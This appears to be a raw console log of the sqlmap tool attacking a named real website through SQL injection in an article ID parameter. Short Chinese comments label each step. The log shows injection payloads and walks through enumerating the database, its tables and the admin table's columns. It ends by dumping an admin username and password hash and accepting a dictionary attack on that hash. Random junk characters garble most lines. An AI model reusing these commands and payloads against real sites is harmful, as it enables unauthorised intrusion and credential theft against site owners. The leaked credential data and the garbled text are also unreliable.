D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* N1 W- \- j4 B% Z' u' J% C
ms "Mysql" --current-user /* 注解:获取当前用户名称
; i( d9 e' H4 V sqlmap/0.9 - automatic SQL injection and database takeover tool! j0 |" l6 N4 G) [5 t# v
http://sqlmap.sourceforge.net starting at: 16:53:54
: ]* M& o: t, n[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# l% U0 t, r; U; n! ^( d, e
session file
: C* j6 O; H7 O, B) S. f; @: d% \/ Z2 E[16:53:54] [INFO] resuming injection data from session file
6 ?( t: H9 F0 M+ V$ y8 y# W- g[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file6 M( U2 W) ?+ \; H! D$ [
[16:53:54] [INFO] testing connection to the target url3 Z* e; _7 x0 {' Y, p* R
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
& ]; B) t- e2 |# a6 Osts:
* [: A& {. J# Q- l) r8 G---
' `* M: `' I, x' tPlace: GET" R- n/ C) k& y( w1 j9 A5 Y
Parameter: id
2 W( z" ~% g: @9 P$ r Type: boolean-based blind
' y* ~) _8 t8 \* e Title: AND boolean-based blind - WHERE or HAVING clause
9 Y* q1 K" Y2 L Payload: id=276 AND 799=799
( K' h/ H% y$ ]* G% h o Type: error-based
6 j' K) s$ ?4 @( V3 i Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& v9 A9 |$ q, S: x7 k7 }
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' x$ V6 ]5 v. [# E
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 }& _5 u0 U: b),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% E5 Z+ h3 {( u Type: UNION query; p5 y$ q% S: `$ f3 G9 C
Title: MySQL UNION query (NULL) - 1 to 10 columns
( A( t2 m* s9 j V Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. @/ o2 e& w2 l. Q5 R9 Y& K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( `1 W' p" w) i+ @+ e% C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" L% m! a8 Z% A+ F) ^8 {/ K0 A" z Type: AND/OR time-based blind* g* p% G, U' F. v3 g
Title: MySQL > 5.0.11 AND time-based blind
( |/ F0 w/ H% j0 z6 _ Payload: id=276 AND SLEEP(5)
6 G$ K6 R& D/ g---
6 [' L( B% k4 x# W! }. W) {[16:53:55] [INFO] the back-end DBMS is MySQL
1 u3 ~. t p* c% B u6 r" Kweb server operating system: Windows
0 x' u+ w" l/ d( q. B7 `' K& ]& l, kweb application technology: Apache 2.2.11, PHP 5.3.0
* ~8 ?$ k q5 r( n' \back-end DBMS: MySQL 5.0
0 c" \. a- H3 b& R3 E# R, l0 l, C6 ]( k& p[16:53:55] [INFO] fetching current user
& I1 Y. j8 E! P0 B0 Qcurrent user: 'root@localhost' : Z8 i3 @# o) x0 O4 o! |
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) |5 H4 [9 S! c
tput\www.wepost.com.hk' shutting down at: 16:53:582 D0 H4 B5 e. ^6 L, k# W
) {3 x! }/ \2 LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" ?6 m6 g5 l7 mms "Mysql" --current-db /*当前数据库
8 V/ z( [( e- h sqlmap/0.9 - automatic SQL injection and database takeover tool, r% ]% o' u3 X& Y$ d d) w
http://sqlmap.sourceforge.net starting at: 16:54:16
9 q* L5 E: `4 R3 d- [[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as! c9 t: X# D$ _ `4 m6 [& r$ x) f
session file" j% h" [0 q+ a7 V. [4 T3 @ T- b
[16:54:16] [INFO] resuming injection data from session file+ J! l0 j( W; W$ P7 E- S) b
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
* h. c6 F. C; i; q5 L+ [4 @[16:54:16] [INFO] testing connection to the target url" `' B# t: ]; u& k0 j" T
sqlmap identified the following injection points with a total of 0 HTTP(s) reque6 [ X6 v) G- N3 K4 l+ b2 i
sts:
( g: l3 i4 L: _4 v- z1 A---# k4 t K" k. T3 G
Place: GET- ~5 ~0 E Q5 k- U3 c% M5 @
Parameter: id
! G$ i" d! s2 S4 e8 A8 f' a Type: boolean-based blind
: _( I! A1 d; _- u& j2 X1 J Title: AND boolean-based blind - WHERE or HAVING clause6 B3 ?0 M y1 Q, d' Z
Payload: id=276 AND 799=799
9 l+ m6 Z% ?* q$ ~7 k Type: error-based d& l! z* U2 l, i
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 z# I$ @1 F0 S* q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' q4 V+ B# Q8 A% Y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 x) P3 O. ~( M
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 F/ n1 {2 z+ ^# s ?& ~' b& ~8 t9 b7 e Type: UNION query
) z) ]2 ^5 |% p1 g9 H# r5 A Title: MySQL UNION query (NULL) - 1 to 10 columns
) L$ A; w) _- `/ A( _3 h: j Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% z5 `! A u5 H+ K F: s6 A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 d4 h( C! K0 x0 D# |6 k' N" ~2 a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" e; T3 j+ e$ \7 `/ u# y
Type: AND/OR time-based blind7 n8 g& f- p3 `* G9 \" {2 K
Title: MySQL > 5.0.11 AND time-based blind7 s; b- s2 V' F. E% X& @# t* _
Payload: id=276 AND SLEEP(5)
4 H d) X% [# {& [---: P- ], J; S) b, q4 m4 t$ Y
[16:54:17] [INFO] the back-end DBMS is MySQL
! H& C0 ]/ d2 j7 b) h& U/ I* qweb server operating system: Windows
& w7 Q" O D) kweb application technology: Apache 2.2.11, PHP 5.3.0
' F D( f. s) h5 w0 g& u6 }7 Oback-end DBMS: MySQL 5.0
2 Y4 a9 L# H* m B% d[16:54:17] [INFO] fetching current database5 q) r9 K/ G6 _! _: s
current database: 'wepost'
D% A o) o! J P, l2 I5 t[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 w' i" d9 x9 H0 B$ `
tput\www.wepost.com.hk' shutting down at: 16:54:18
8 n' v2 R0 l) A, h5 g6 mD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* C( ]% o) W2 n4 t. y1 V
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
+ j+ _5 w3 @% Y sqlmap/0.9 - automatic SQL injection and database takeover tool* x0 c* O8 ?. G& }
http://sqlmap.sourceforge.net starting at: 16:55:25+ `9 r ]. e0 p
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 U2 Z- G2 D! @) P: q4 [+ s session file
) z6 |. \1 a, \- t. I[16:55:25] [INFO] resuming injection data from session file2 ^& }1 F3 T8 s8 G9 P
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
6 [5 { Q, u( Z4 J- ~6 a, K[16:55:25] [INFO] testing connection to the target url
$ W: |' @+ Y+ l1 V; h9 V2 `sqlmap identified the following injection points with a total of 0 HTTP(s) reque
# C/ o! h J& X% Bsts:/ j: B: j9 Z5 j7 r. o6 \
--- k" e$ v( N$ h" q+ n
Place: GET
$ o1 R( a5 s/ u% I, nParameter: id
) ?+ b: e( U& l+ g3 n9 e ?( N Type: boolean-based blind. R* \5 ~- `5 k- ?1 e
Title: AND boolean-based blind - WHERE or HAVING clause7 Y2 e( A, h7 g& W* C- F; X' a! _, n
Payload: id=276 AND 799=7995 w- i/ I, q( u4 A; ^( l
Type: error-based
- w J* h1 Q) O' }, T7 ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
& i1 g. d0 ]6 A. K+ U6 Z: [1 j/ J Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
! X" D# y' h) c" c% |- S120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* l3 e( Q) n g+ d& `3 G$ j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 i4 h( ?8 ]& U. Q Type: UNION query& G0 R. d4 u2 G) q
Title: MySQL UNION query (NULL) - 1 to 10 columns
( r) E2 O+ q. v& N7 W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 K; q( x% T7 E8 y: D% w$ R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) k/ |( l3 i5 W) s8 `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: W0 w$ M5 }( D& `2 M* a( {6 w
Type: AND/OR time-based blind
, z8 X) y9 L8 j5 _4 I% P4 V Title: MySQL > 5.0.11 AND time-based blind
9 R: ~: X; w# \! p3 S: d/ c1 E! n" G Payload: id=276 AND SLEEP(5)1 ^: l1 [# \; F) ^1 i: s, Y
---/ t9 T4 s9 o/ a: Z! W7 w
[16:55:26] [INFO] the back-end DBMS is MySQL! d. f7 ^+ K$ D; N8 ]. e
web server operating system: Windows+ z' p+ Q# u5 F4 ]6 G' ~6 A. [
web application technology: Apache 2.2.11, PHP 5.3.0
x1 p# |6 U- V; F2 [& sback-end DBMS: MySQL 5.08 F4 s* Y/ A4 M
[16:55:26] [INFO] fetching tables for database 'wepost'
[, K' |1 X* j. c# q( j$ S) q" S[16:55:27] [INFO] the SQL query used returns 6 entries
6 f/ n# Z6 l2 X7 A+ @# tDatabase: wepost) N# ]4 L# A. K% n1 I
[6 tables]
2 v7 ]1 r" ~: W* Q+-------------+
$ ?$ R: P( @2 L* y6 A5 `| admin |# l: D+ y* [7 q1 `1 t
| article |7 _8 R/ [ q! m& U, _: ~3 @* o) a4 C
| contributor |; v+ {7 \4 F& H
| idea |
0 S7 c, ^, Q/ h- {# \/ I1 L| image |3 v' |* t8 ]7 i
| issue |9 k2 v* n: l8 I! \' j# }! J$ G
+-------------+
2 r, j, ^5 n* p6 l+ g[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
4 ^$ e9 V8 M$ w1 w" htput\www.wepost.com.hk' shutting down at: 16:55:33
% [3 Y: }; f; U2 b# J' \& c! O' U. z9 l& k4 g/ W0 R4 V# C6 ?
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& `9 b3 t" _0 _
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名3 T& a/ x& C' v* f
sqlmap/0.9 - automatic SQL injection and database takeover tool
\0 Z( J! G2 m http://sqlmap.sourceforge.net starting at: 16:56:06
& d: N- n" { p9 O6 J* M3 s# A$ K. A# csqlmap identified the following injection points with a total of 0 HTTP(s) reque
{+ T- x' [: e6 o" wsts:3 V; {+ J# C: d# ?) {# y
---
1 h/ F% A8 m y( P* HPlace: GET' J* J* P+ l: Z3 y
Parameter: id
: x' L9 \7 s$ q Type: boolean-based blind* o. _( N i {; c1 j
Title: AND boolean-based blind - WHERE or HAVING clause! S$ W/ s5 N0 u9 y% m! c
Payload: id=276 AND 799=799- w! j5 p0 H# p4 c8 l
Type: error-based% M& W3 I7 G V3 [8 B5 r$ O4 ]
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 e" d; d5 t( D$ B& ~6 N- ]1 g; r Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ Q9 _" i# O% C( S; _' U
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# W$ h1 s' G$ Q& e4 _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 N c* H; x# K1 t1 k( x( E# g
Type: UNION query
0 v) H; H5 ?$ Q' @7 I Title: MySQL UNION query (NULL) - 1 to 10 columns. L7 t% g5 G! d4 }7 h
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 \9 h- U0 Y8 X(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),, m2 s4 Z5 F4 c! Y$ y
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% f' ^8 _ R1 T" [* t. G
Type: AND/OR time-based blind7 \( v$ J( U6 Z3 U n o( a
Title: MySQL > 5.0.11 AND time-based blind
9 g4 D. j% q% A5 W4 r Payload: id=276 AND SLEEP(5)
$ |* [% ^, g, W+ s9 Z+ f3 C---$ ^, i; ^' X# S0 H: c& L
web server operating system: Windows
- \" a, w+ Y: {# oweb application technology: Apache 2.2.11, PHP 5.3.0
0 O- @! ]3 M% Y% [& Y( P9 Zback-end DBMS: MySQL 5.0
7 ]; F/ u9 R. W( Z[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
: h0 a5 E; p- y2 P, P! }4 Y0 N6 S, T8 sssion': wepost, wepost
7 m" `% x+ d4 s8 }6 T& k/ z1 m) _Database: wepost; _( G2 ^5 K; _/ g, j& B0 Z
Table: admin6 A' K0 R* C4 _' N: B; \
[4 columns]
, w- B) }! S8 u8 u9 D. u) p& S" D& d+----------+-------------+' C2 H6 H2 N7 {) a6 Z
| Column | Type |
$ _, {/ D, N$ g5 f/ h) o+----------+-------------+( |" ^+ H6 r3 w# J; I$ z
| id | int(11) |. Q! Y' n. p) Z/ o3 R( [" b5 j
| password | varchar(32) |" Q8 z& Z5 z l: g' \! D9 b
| type | varchar(10) |
/ w$ C' G4 T% Q# Q| userid | varchar(20) |8 E0 O9 s! G- R% h9 D
+----------+-------------+# f, h" G3 L" R0 j% L
shutting down at: 16:56:19
& F$ w: l" S6 g1 e5 X s: \1 F+ t: G/ K, W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) b$ c8 \" A/ `( M9 Q( ams "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
( h6 o- B& t( V, p sqlmap/0.9 - automatic SQL injection and database takeover tool( Z0 C9 Q2 p. C! `2 B$ s
http://sqlmap.sourceforge.net starting at: 16:57:14
+ |# o% h/ L' g+ ]% ]6 psqlmap identified the following injection points with a total of 0 HTTP(s) reque
* _" M% @+ g$ G" T! Y0 ^8 O% Xsts:# y* }- ^ a) L" s. V
---1 v# ]. ~5 W$ P* }5 G
Place: GET" Y: @* X( g. M. O1 ^5 ]
Parameter: id
& }' @$ W! ]. V, ]; L Type: boolean-based blind
) s5 b }/ s/ B; _) v: o3 o3 z Title: AND boolean-based blind - WHERE or HAVING clause
! r' T/ A9 X% p# D' A$ A" m8 I( F" \ Payload: id=276 AND 799=799
8 B8 g+ v, L- G* v L Type: error-based
- O4 m8 D8 R8 G) U& M: L Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
6 W& S9 q3 h* s6 p n" J+ ?9 | Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,' Z# s) r& s1 f9 [& `
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 {2 j2 I6 F: a8 a1 D8 U0 q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
3 J: v% a: t5 K- x( y! q) G Type: UNION query9 R0 |! {( X( q( Q" k! m* o n
Title: MySQL UNION query (NULL) - 1 to 10 columns2 a' B, N8 f9 w: |( F4 v
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" V8 J5 ]9 z* E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 g, U7 A* _, W$ C
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
" Q( l: s% E( `( f Type: AND/OR time-based blind0 ]$ }) Z& ?! V( H- X. S3 q
Title: MySQL > 5.0.11 AND time-based blind9 j7 _; H1 ?) B8 y7 A [& r) z
Payload: id=276 AND SLEEP(5)
3 {7 h7 g) i" z# D1 Y* Z/ v$ {$ l---
. z& O( ?; w; _; G) e* Aweb server operating system: Windows* A9 V7 N* f1 g8 Y9 E1 |5 ]
web application technology: Apache 2.2.11, PHP 5.3.0
6 p% t B1 j' ]5 \" jback-end DBMS: MySQL 5.0 T* a2 P) Z8 \4 }( L
recognized possible password hash values. do you want to use dictionary attack o2 d0 U2 K9 a9 u# E# p
n retrieved table items? [Y/n/q] y) ] d- s! P. X- p+ N% z
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]' T: _, M3 p8 N% }
do you want to use common password suffixes? (slow!) [y/N] y
. ]2 b; E z+ @! R/ P4 l* q3 T3 C) sDatabase: wepost
; [: [9 o: K Y; p# hTable: admin
$ q* L* V" s, d6 G[1 entry]
+ ?' o7 H) w. v7 ?# _8 g9 r. M" m* y+----------------------------------+------------+
8 ]) h6 R- N! x# r, d. ?| password | userid |4 l% U' o( W" i1 _$ W
+----------------------------------+------------+
6 m+ W' a/ Y- H2 @7 j% [* U T| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" `3 F8 m& Z7 s+----------------------------------+------------+
8 i+ Y y" G9 f( S+ f3 _ shutting down at: 16:58:14
' n2 J" u9 z) j6 r4 y% S$ ~( z! d7 ^! u. w3 @1 k! N/ B
D:\Python27\sqlmap> |